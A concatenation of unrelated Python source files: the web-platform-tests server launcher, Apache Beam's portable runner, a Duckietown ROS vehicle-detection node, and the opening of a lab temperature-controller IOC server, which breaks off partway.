handler = handlers.StaticHandler(path, format_args, content_type, **headers)
self.add_handler("GET", str(route), handler)
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.worker-module.html", WorkerModulesHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.sharedworker.html", SharedWorkersHandler),
("GET", "*.any.sharedworker-module.html", SharedWorkerModulesHandler),
("GET", "*.any.serviceworker.html", ServiceWorkersHandler),
("GET", "*.any.serviceworker-module.html", ServiceWorkerModulesHandler),
("GET", "*.any.worker.js", ClassicWorkerHandler),
("GET", "*.any.worker-module.js", ModuleWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("GET", "/.well-known/origin-policy", handlers.PythonScriptHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
"%s%s" % (url_base if url_base != "/" else "", suffix),
handler_cls(base_path=path, url_base=url_base)))
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def get_route_builder(logger, aliases, config):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
logger.error("\"url-path\" value must start with '/'.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder
class ServerProc(object):
def __init__(self, mp_context, scheme=None):
self.proc = None
self.daemon = None
self.mp_context = mp_context
self.stop_flag = mp_context.Event()
self.scheme = scheme
def start(self, init_func, host, port, paths, routes, bind_address, config, log_handlers, **kwargs):
self.proc = self.mp_context.Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_address,
config, log_handlers),
name='%s on port %s' % (self.scheme, port),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_address,
config, log_handlers, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
importlib.reload(logging)
logger = get_logger(config.log_level, log_handlers)
if sys.platform == "darwin":
# on Darwin, NOFILE starts with a very low limit (256), so bump it up a little
# by way of comparison, Debian starts with a limit of 1024, Windows 512
import resource # local, as it only exists on Unix-like systems
maxfilesperproc = int(subprocess.check_output(
["sysctl", "-n", "kern.maxfilesperproc"]
).strip())
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
# 2048 is somewhat arbitrary, but gives us some headroom for wptrunner --parallel
# note that it's expected that 2048 will be the min here
new_soft = min(2048, maxfilesperproc, hard)
if soft < new_soft:
resource.setrlimit(resource.RLIMIT_NOFILE, (new_soft, hard))
try:
self.daemon = init_func(logger, host, port, paths, routes, bind_address, config, **kwargs)
except OSError:
logger.critical("Socket error on port %s" % port, file=sys.stderr)
raise
except Exception:
logger.critical(traceback.format_exc())
raise
if self.daemon:
try:
self.daemon.start()
try:
self.stop_flag.wait()
except KeyboardInterrupt:
pass
finally:
self.daemon.stop()
except Exception:
logger.critical(traceback.format_exc())
raise
def stop(self, timeout=None):
self.stop_flag.set()
self.proc.join(timeout)
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(logger, config, routes, mp_context, log_handlers):
paths = config.paths
bind_address = config.bind_address
host = config.server_host
port = get_port()
logger.debug("Going to use port %d to check subdomains" % port)
wrapper = ServerProc(mp_context)
wrapper.start(start_http_server, host, port, paths, routes,
bind_address, config, log_handlers)
url = "http://{}:{}/".format(host, port)
connected = False
for i in range(10):
try:
urllib.request.urlopen(url)
connected = True
break
except urllib.error.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server "
"on {}. {}".format(url, EDIT_HOSTS_HELP))
sys.exit(1)
for domain in config.domains_set:
if domain == host:
continue
try:
urllib.request.urlopen("http://%s:%d/" % (domain, port))
except Exception:
logger.critical("Failed probing domain {}. {}".format(domain, EDIT_HOSTS_HELP))
sys.exit(1)
wrapper.stop()
def make_hosts_file(config, host):
rv = []
for domain in config.domains_set:
rv.append("%s\t%s\n" % (host, domain))
# Windows interpets the IP address 0.0.0.0 as non-existent, making it an
# appropriate alias for non-existent hosts. However, UNIX-like systems
# interpret the same address to mean any IP address, which is inappropraite
# for this context. These systems do not reserve any value for this
# purpose, so the inavailability of the domains must be taken for granted.
#
# https://github.com/web-platform-tests/wpt/issues/10560
if platform.uname()[0] == "Windows":
for not_domain in config.not_domains_set:
rv.append("0.0.0.0\t%s\n" % not_domain)
return "".join(rv)
def start_servers(logger, host, ports, paths, routes, bind_address, config,
mp_context, log_handlers, **kwargs):
servers = defaultdict(list)
for scheme, ports in ports.items():
assert len(ports) == {"http": 2, "https": 2}.get(scheme, 1)
# If trying to start HTTP/2.0 server, check compatibility
if scheme == 'h2' and not http2_compatible():
logger.error('Cannot start HTTP/2.0 server as the environment is not compatible. ' +
'Requires OpenSSL 1.0.2+')
continue
# Skip WebTransport over HTTP/3 server unless if is enabled explicitly.
if scheme == 'webtransport-h3' and not kwargs.get("webtransport_h3"):
continue
for port in ports:
if port is None:
continue
init_func = {
"http": start_http_server,
"http-private": start_http_server,
"http-public": start_http_server,
"https": start_https_server,
"https-private": start_https_server,
"https-public": start_https_server,
"h2": start_http2_server,
"ws": start_ws_server,
"wss": start_wss_server,
"webtransport-h3": start_webtransport_h3_server,
}[scheme]
server_proc = ServerProc(mp_context, scheme=scheme)
server_proc.start(init_func, host, port, paths, routes, bind_address,
config, log_handlers, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def startup_failed(logger):
logger.critical(EDIT_HOSTS_HELP)
sys.exit(1)
def start_http_server(logger, host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
except Exception:
startup_failed(logger)
def start_https_server(logger, host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
except Exception:
startup_failed(logger)
def start_http2_server(logger, host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
handler_cls=wptserve.Http2WebTestRequestHandler,
doc_root=paths["doc_root"],
ws_doc_root=paths["ws_doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"),
http2=True)
except Exception:
startup_failed(logger)
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, bind_address, ssl_config):
logger = logging.getLogger()
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root]
if ssl_config is not None:
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"]]
if (bind_address):
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
ports = [item[0].getsockname()[1] for item in self.server._sockets]
if not ports:
# TODO: Fix the logging configuration in WebSockets processes
# see https://github.com/web-platform-tests/wpt/issues/22719
logger.critical("Failed to start websocket server on port %s, "
"is something already using that port?" % port, file=sys.stderr)
raise OSError()
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self):
self.started = True
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def start_ws_server(logger, host, port, paths, routes, bind_address, config, **kwargs):
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
ssl_config=None)
except Exception:
startup_failed(logger)
def start_wss_server(logger, host, port, paths, routes, bind_address, config, **kwargs):
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
config.ssl_config)
except Exception:
startup_failed(logger)
def start_webtransport_h3_server(logger, host, port, paths, routes, bind_address, config, **kwargs):
try:
# TODO(bashi): Move the following import to the beginning of this file
# once WebTransportH3Server is enabled by default.
from webtransport.h3.webtransport_h3_server import WebTransportH3Server # type: ignore
return WebTransportH3Server(host=host,
port=port,
doc_root=paths["doc_root"],
cert_path=config.ssl_config["cert_path"],
key_path=config.ssl_config["key_path"],
logger=logger)
except Exception as error:
logger.critical(
"Failed to start WebTransport over HTTP/3 server: {}".format(error))
sys.exit(0)
def start(logger, config, routes, mp_context, log_handlers, **kwargs):
host = config["server_host"]
ports = config.ports
paths = config.paths
bind_address = config["bind_address"]
logger.debug("Using ports: %r" % ports)
servers = start_servers(logger, host, ports, paths, routes, bind_address, config, mp_context,
log_handlers, **kwargs)
return servers
def iter_servers(servers):
for servers in servers.values():
for port, server in servers:
yield server
def _make_subdomains_product(s: Set[str], depth: int = 2) -> Set[str]:
return {u".".join(x) for x in chain(*(product(s, repeat=i) for i in range(1, depth+1)))}
def _make_origin_policy_subdomains(limit: int) -> Set[str]:
return {u"op%d" % x for x in range(1,limit+1)}
_subdomains = {u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"}
_not_subdomains = {u"nonexistent"}
_subdomains = _make_subdomains_product(_subdomains)
# Origin policy subdomains need to not be reused by any other tests, since origin policies have
# origin-wide impacts like installing a CSP or Feature Policy that could interfere with features
# under test.
# See https://github.com/web-platform-tests/rfcs/pull/44.
_subdomains |= _make_origin_policy_subdomains(99)
_not_subdomains = _make_subdomains_product(_not_subdomains)
class ConfigBuilder(config.ConfigBuilder):
"""serve config
This subclasses wptserve.config.ConfigBuilder to add serve config options.
"""
_default = {
"browser_host": "web-platform.test",
"alternate_hosts": {
"alt": "not-web-platform.test"
},
"doc_root": repo_root,
"ws_doc_root": os.path.join(repo_root, "websockets", "handlers"),
"server_host": None,
"ports": {
"http": [8000, "auto"],
"http-private": ["auto"],
"http-public": ["auto"],
"https": [8443, 8444],
"https-private": ["auto"],
"https-public": ["auto"],
"ws": ["auto"],
"wss": ["auto"],
"webtransport-h3": ["auto"],
},
"check_subdomains": True,
"log_level": "info",
"bind_address": True,
"ssl": {
"type": "pregenerated",
"encrypt_after_connect": False,
"openssl": {
"openssl_binary": "openssl",
"base_path": "_certs",
"password": "web-platform-tests",
"force_regenerate": False,
"duration": 30,
"base_conf_path": None
},
"pregenerated": {
"host_key_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.key"),
"host_cert_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.pem")
},
"none": {}
},
"aliases": []
}
computed_properties = ["ws_doc_root"] + config.ConfigBuilder.computed_properties
def __init__(self, logger, *args, **kwargs):
if "subdomains" not in kwargs:
kwargs["subdomains"] = _subdomains
if "not_subdomains" not in kwargs:
kwargs["not_subdomains"] = _not_subdomains
super(ConfigBuilder, self).__init__(
logger,
*args,
**kwargs
)
with self as c:
browser_host = c.get("browser_host")
alternate_host = c.get("alternate_hosts", {}).get("alt")
if not domains_are_distinct(browser_host, alternate_host):
raise ValueError(
"Alternate host must be distinct from browser host"
)
def _get_ws_doc_root(self, data):
if data["ws_doc_root"] is not None:
return data["ws_doc_root"]
else:
return os.path.join(data["doc_root"], "websockets", "handlers")
def _get_paths(self, data):
rv = super(ConfigBuilder, self)._get_paths(data)
rv["ws_doc_root"] = data["ws_doc_root"]
return rv
def build_config(logger, override_path=None, config_cls=ConfigBuilder, **kwargs):
rv = config_cls(logger)
enable_http2 = kwargs.get("h2")
if enable_http2 is None:
enable_http2 = True
if enable_http2:
rv._default["ports"]["h2"] = [9000]
if override_path and os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
with open(other_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
if kwargs.get("verbose"):
rv.log_level = "debug"
overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
setattr(rv, key, value)
return rv
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
parser.add_argument("--alias_file", action="store", dest="alias_file",
help="File with entries for aliases/multiple doc roots. In form of `/ALIAS_NAME/, DOC_ROOT\\n`")
parser.add_argument("--h2", action="store_true", dest="h2", default=None,
help=argparse.SUPPRESS)
parser.add_argument("--no-h2", action="store_false", dest="h2", default=None,
help="Disable the HTTP/2.0 server")
parser.add_argument("--webtransport-h3", action="store_true",
help="Enable WebTransport over HTTP/3 server")
parser.add_argument("--exit-after-start", action="store_true", help="Exit after starting servers")
parser.add_argument("--verbose", action="store_true", help="Enable verbose logging")
parser.set_defaults(report=False)
parser.set_defaults(is_wave=False)
return parser
class MpContext(object):
def __getattr__(self, name):
return getattr(multiprocessing, name)
def get_logger(log_level, log_handlers):
"""Get a logger configured to log at level log_level
If the logger has existing handlers the log_handlers argument is ignored.
Otherwise the handlers in log_handlers are added to the logger. If there are
no log_handlers passed and no configured handlers, a stream handler is added
to the logger.
Typically this is called once per process to set up logging in that process.
:param log_level: - A string representing a log level e.g. "info"
:param log_handlers: - Optional list of Handler objects.
"""
logger = logging.getLogger()
logger.setLevel(getattr(logging, log_level.upper()))
if not logger.hasHandlers():
if log_handlers is not None:
for handler in log_handlers:
logger.addHandler(handler)
else:
handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter("[%(asctime)s %(processName)s] %(levelname)s - %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
def run(config_cls=ConfigBuilder, route_builder=None, mp_context=None, log_handlers=None,
**kwargs):
logger = get_logger("INFO", log_handlers)
if mp_context is None:
if hasattr(multiprocessing, "get_context"):
mp_context = multiprocessing.get_context()
else:
mp_context = MpContext()
with build_config(logger,
os.path.join(repo_root, "config.json"),
config_cls=config_cls,
**kwargs) as config:
# This sets the right log level
logger = get_logger(config.log_level, log_handlers)
bind_address = config["bind_address"]
if kwargs.get("alias_file"):
with open(kwargs["alias_file"], 'r') as alias_file:
for line in alias_file:
alias, doc_root = [x.strip() for x in line.split(',')]
config["aliases"].append({
'url-path': alias,
'local-dir': doc_root,
})
if route_builder is None:
route_builder = get_route_builder
routes = route_builder(logger, config.aliases, config).get_routes()
if config["check_subdomains"]:
check_subdomains(logger, config, routes, mp_context, log_handlers)
stash_address = None
if bind_address:
stash_address = (config.server_host, get_port(""))
logger.debug("Going to use port %d for stash" % stash_address[1])
with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
servers = start(logger, config, routes, mp_context, log_handlers, **kwargs)
if not kwargs.get("exit_after_start"):
try:
# Periodically check if all the servers are alive
server_process_exited = False
while not server_process_exited:
for server in iter_servers(servers):
server.proc.join(1)
if not server.proc.is_alive():
server_process_exited = True
break
except KeyboardInterrupt:
pass
failed_subproc = 0
for server in iter_servers(servers):
subproc = server.proc
if subproc.is_alive():
logger.info('Status of subprocess "%s": running', subproc.name)
server.stop(timeout=1)
if server.proc.exitcode == 0:
logger.info('Status of subprocess "%s": exited correctly', subproc.name)
else:
logger.warning('Status of subprocess "%s": failed. Exit with non-zero status: %d',
subproc.name, subproc.exitcode)
failed_subproc += 1
return failed_subproc
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import logging
import os
import threading
import grpc
from apache_beam import coders
from apache_beam import metrics
from apache_beam.internal import pickler
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import portable_stager
__all__ = ['PortableRunner']
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.STOPPED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self, is_embedded_fnapi_runner=False):
self.is_embedded_fnapi_runner = is_embedded_fnapi_runner
@staticmethod
def default_docker_image():
if 'USER' in os.environ:
# Perhaps also test if this was built?
logging.info('Using latest locally built Python SDK docker image.')
return os.environ['USER'] + '-docker-apache.bintray.io/beam/python:latest'
else:
logging.warning('Could not find a Python SDK docker image.')
return 'unknown'
def run_pipeline(self, pipeline):
docker_image = (
pipeline.options.view_as(PortableOptions).harness_docker_image
or self.default_docker_image())
job_endpoint = pipeline.options.view_as(PortableOptions).job_endpoint
if not job_endpoint:
raise ValueError(
'job_endpoint should be provided while creating runner.')
proto_context = pipeline_context.PipelineContext(
default_environment_url=docker_image)
proto_pipeline = pipeline.to_runner_api(context=proto_context)
if not self.is_embedded_fnapi_runner:
# Java has different expectations about coders
# (windowed in Fn API, but *un*windowed in runner API), whereas the
# embedded FnApiRunner treats them consistently, so we must guard this
# for now, until FnApiRunner is fixed.
# See also BEAM-2717.
for pcoll in proto_pipeline.components.pcollections.values():
if pcoll.coder_id not in proto_context.coders:
# This is not really a coder id, but a pickled coder.
coder = coders.registry.get_coder(pickler.loads(pcoll.coder_id))
pcoll.coder_id = proto_context.coders.get_id(coder)
proto_context.coders.populate_map(proto_pipeline.components.coders)
# Some runners won't detect the GroupByKey transform unless it has no
# subtransforms. Remove all sub-transforms until BEAM-4605 is resolved.
for _, transform_proto in list(
proto_pipeline.components.transforms.items()):
if transform_proto.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
for sub_transform in transform_proto.subtransforms:
del proto_pipeline.components.transforms[sub_transform]
del transform_proto.subtransforms[:]
# TODO: Define URNs for options.
options = {'beam:option:' + k + ':v1': v
for k, v in pipeline._options.get_all_options().iteritems()
if v is not None}
job_service = beam_job_api_pb2_grpc.JobServiceStub(
grpc.insecure_channel(job_endpoint))
prepare_response = job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job', pipeline=proto_pipeline,
pipeline_options=job_utils.dict_to_struct(options)))
if prepare_response.artifact_staging_endpoint.url:
stager = portable_stager.PortableStager(
grpc.insecure_channel(prepare_response.artifact_staging_endpoint.url),
prepare_response.staging_session_token)
retrieval_token, _ = stager.stage_job_resources(
pipeline._options,
staging_location='')
else:
retrieval_token = None
run_response = job_service.Run(
beam_job_api_pb2.RunJobRequest(
preparation_id=prepare_response.preparation_id,
retrieval_token=retrieval_token))
return PipelineResult(job_service, run_response.job_id)
class PortableMetrics(metrics.metric.MetricResults):
def __init__(self):
pass
def query(self, filter=None):
return {'counters': [],
'distributions': [],
'gauges': []}
class PipelineResult(runner.PipelineResult):
def __init__(self, job_service, job_id):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
def cancel(self):
self._job_service.Cancel()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
return PortableMetrics()
def wait_until_finish(self):
def read_messages():
for message in self._job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=self._job_id)):
self._messages.append(message)
t = threading.Thread(target=read_messages, name='wait_until_finish_read')
t.daemon = True
t.start()
for state_response in self._job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)):
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
break
if self._state != runner.PipelineState.DONE:
raise RuntimeError(
'Pipeline %s failed in state %s.' % (self._job_id, self._state))
return self._state
|
vehicle_detection_node.py
|
#!/usr/bin/env python
from copy import deepcopy
from cv_bridge import CvBridge, CvBridgeError
from duckietown_msgs.msg import BoolStamped
from geometry_msgs.msg import Point32
from mutex import mutex
from sensor_msgs.msg import CompressedImage, Image
from std_msgs.msg import Float32
import cv2
import numpy as np
import os
import rospkg
import rospy
import threading
import time
import yaml
class VehicleDetectionNode(object):
def __init__(self):
self.node_name = rospy.get_name()
self.bridge = CvBridge()
self.active = True
self.config = self.setupParam("~config", "baseline")
self.cali_file_name = self.setupParam("~cali_file_name", "default")
rospack = rospkg.RosPack()
self.cali_file = rospack.get_path('duckietown') + \
"/config/" + self.config + \
"/vehicle_detection/vehicle_detection_node/" + \
self.cali_file_name + ".yaml"
if not os.path.isfile(self.cali_file):
rospy.logwarn("[%s] Can't find calibration file: %s.\n"
% (self.node_name, self.cali_file))
self.loadConfig(self.cali_file)
self.sub_image = rospy.Subscriber("~image", Image,
self.cbImage, queue_size=1)
self.sub_switch = rospy.Subscriber("~switch", BoolStamped,
self.cbSwitch, queue_size=1)
self.pub_detection = rospy.Publisher("~detection",
BoolStamped, queue_size=1)
self.pub_circlepattern_image = rospy.Publisher("~circlepattern_image",
Image, queue_size=1)
self.pub_time_elapsed = rospy.Publisher("~detection_time",
Float32, queue_size=1)
self.lock = mutex()
rospy.loginfo("[%s] Initialization completed" % (self.node_name))
def setupParam(self,param_name,default_value):
value = rospy.get_param(param_name,default_value)
rospy.set_param(param_name, value)
rospy.loginfo("[%s] %s = %s " %(self.node_name,param_name,value))
return value
def loadConfig(self, filename):
stream = file(filename, 'r')
data = yaml.load(stream)
stream.close()
self.circlepattern_dims = tuple(data['circlepattern_dims']['data'])
self.blobdetector_min_area = data['blobdetector_min_area']
self.blobdetector_min_dist_between_blobs = data['blobdetector_min_dist_between_blobs']
self.publish_circles = data['publish_circles']
rospy.loginfo('[%s] circlepattern_dim : %s' % (self.node_name,
self.circlepattern_dims,))
rospy.loginfo('[%s] blobdetector_min_area: %.2f' % (self.node_name,
self.blobdetector_min_area))
rospy.loginfo('[%s] blobdetector_min_dist_between_blobs: %.2f' % (self.node_name,
self.blobdetector_min_dist_between_blobs))
rospy.loginfo('[%s] publish_circles: %r' % (self.node_name,
self.publish_circles))
def cbSwitch(self, switch_msg):
self.active = switch_msg.data
def cbImage(self, image_msg):
if not self.active:
return
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
# Returns rightaway
def processImage(self, image_msg):
if self.lock.testandset():
vehicle_detected_msg_out = BoolStamped()
try:
image_cv=self.bridge.imgmsg_to_cv2(image_msg,"bgr8")
except CvBridgeError as e:
print e
start = rospy.Time.now()
params = cv2.SimpleBlobDetector_Params()
params.minArea = self.blobdetector_min_area
params.minDistBetweenBlobs = self.blobdetector_min_dist_between_blobs
simple_blob_detector = cv2.SimpleBlobDetector(params)
(detection, corners) = cv2.findCirclesGrid(image_cv,
self.circlepattern_dims, flags=cv2.CALIB_CB_SYMMETRIC_GRID,
blobDetector=simple_blob_detector)
elapsed_time = (rospy.Time.now() - start).to_sec()
self.pub_time_elapsed.publish(elapsed_time)
vehicle_detected_msg_out.data = detection
self.pub_detection.publish(vehicle_detected_msg_out)
if self.publish_circles:
cv2.drawChessboardCorners(image_cv,
self.circlepattern_dims, corners, detection)
image_msg_out = self.bridge.cv2_to_imgmsg(image_cv, "bgr8")
self.pub_circlepattern_image.publish(image_msg_out)
self.lock.unlock()
if __name__ == '__main__':
rospy.init_node('vehicle_detection', anonymous=False)
vehicle_detection_node = VehicleDetectionNode()
rospy.spin()
|
temperature_server_IOC copy.py
|
"""Temperature controller server
The server communicates with Lightwave( previously known as temperature controller IOC) and Oasis IOC to synchronize the temperature changes.
Authors: Valentyn Stadnydskyi, Friedrich Schotte
Date created: 2019-05-08
Date last modified: 2019-05-14
"""
__version__ = "0.1" # Friedrich Schotte: bug fixes
from logging import debug,warn,info,error
import os
from IOC import IOC
import traceback
from time import time,sleep
from numpy import empty, mean, std, zeros, abs, where, nan , isnan
import numpy.polynomial.polynomial as poly
from scipy.interpolate import interp1d
from CA import caget, caput
from CAServer import casput,casget,casdel
import platform
try:
computer_name = platform.node()
except:
error(traceback.format_exc())
computer_name = 'unknown'
import socket
try:
ip_address = socket.gethostbyname(socket.gethostname())
except:
error(traceback.format_exc())
ip_address = '0.0.0.0'
class Temperature_Server_IOC(object):
name = "temperature_server_IOC"
from persistent_property import persistent_property
prefix = persistent_property("prefix","NIH:TEMP")
SCAN = persistent_property("SCAN",0.5)
P_default = persistent_property("P_default",1.000)
I_default = persistent_property("I_default",0.316)
D_default = persistent_property("D_default",0.562)
oasis_slave = persistent_property("oasis_slave",1)
temperature_oasis_switch = persistent_property("T_threshold",83.0)
idle_temperature_oasis = persistent_property("idle_temperature_oasis",8.0)
temperature_oasis_limit_high = persistent_property("temperature_oasis_limit_high",45.0)
oasis_headstart_time = persistent_property("oasis_headstart_time",15.0)
lightwave_prefix = persistent_property("lightwave_prefix",'NIH:LIGHTWAVE')
oasis_prefix = persistent_property("oasis_prefix",'NIH:CHILLER')
set_point_update_period = persistent_property("set_point_update_period",0.5)
running = False
last_valid_reply = 0
was_online = False
ramping_cancelled = False
idle_temperature = 22.0
time_points = []
temp_points = []
def get_EPICS_enabled(self):
return self.running
def set_EPICS_enabled(self,value):
from thread import start_new_thread
if value:
if not self.running: start_new_thread(self.run,())
else: self.running = False
EPICS_enabled = property(get_EPICS_enabled,set_EPICS_enabled)
def startup(self):
from CAServer import casput,casmonitor
from CA import caput,camonitor
from numpy import nan
#self.P_default , self.I_default , self.D_default = 1.0,0.316,0.562
#print('startup with prefix = %r' %self.prefix)
casput(self.prefix+".SCAN",self.SCAN)
casput(self.prefix+".DESC",value = "Temperature server IOC: a System Layer server that orchestrates setting on Lightwave IOC and Oasis IOC.", update = False)
casput(self.prefix+".EGU",value = "C")
# Set defaults
casput(self.prefix+".VAL",value = nan)
casput(self.prefix+".VAL_ADV",value = nan)
casput(self.prefix+".RBV",value = nan)
casput(self.prefix+".P",value = nan)
casput(self.prefix+".I",value = nan)
casput(self.prefix+".TIME_POINTS",self.time_points)
casput(self.prefix+".TEMP_POINTS",self.temp_points)
casput(self.prefix+".FAULTS"," ")
casput(self.prefix+".DMOV",value = nan)
casput(self.prefix+".KILL",value = 'write password to kill the process')
casput(self.prefix+".P_default",value = self.P_default)
casput(self.prefix+".I_default",value = self.I_default)
casput(self.prefix+".D_default",value = self.D_default)
casput(self.prefix+".oasis_slave",value = self.oasis_slave)
casput(self.prefix+".temperature_oasis_switch",value = self.temperature_oasis_switch)
casput(self.prefix+".idle_temperature_oasis",value = self.idle_temperature_oasis)
casput(self.prefix+".temperature_oasis_limit_high",value = self.temperature_oasis_limit_high)
casput(self.prefix+".oasis_headstart_time",value = self.oasis_headstart_time)
casput(self.prefix+".lightwave_prefix",value = self.lightwave_prefix)
casput(self.prefix+".oasis_prefix",value = self.oasis_prefix)
casput(self.prefix+".set_point_update_period",value = self.set_point_update_period)
casput(self.prefix+".oasis_RBV",value = nan)
casput(self.prefix+".oasis_VAL",value = nan)
casput(self.prefix+".processID",value = os.getpid())
casput(self.prefix+".computer_name",value = computer_name)
casput(self.prefix+".ip_address",value = ip_address)
#PV with a list of all process variable registered at the current Channel Access Server
casput(self.prefix+".LIST_ALL_PVS",value = self.get_pv_list())
# Monitor client-writable PVs.
casmonitor(self.prefix+".VAL",callback=self.monitor)
casmonitor(self.prefix+".VAL_ADV",callback=self.monitor)
casmonitor(self.prefix+".TIME_POINTS",callback=self.monitor)
casmonitor(self.prefix+".TEMP_POINTS",callback=self.monitor)
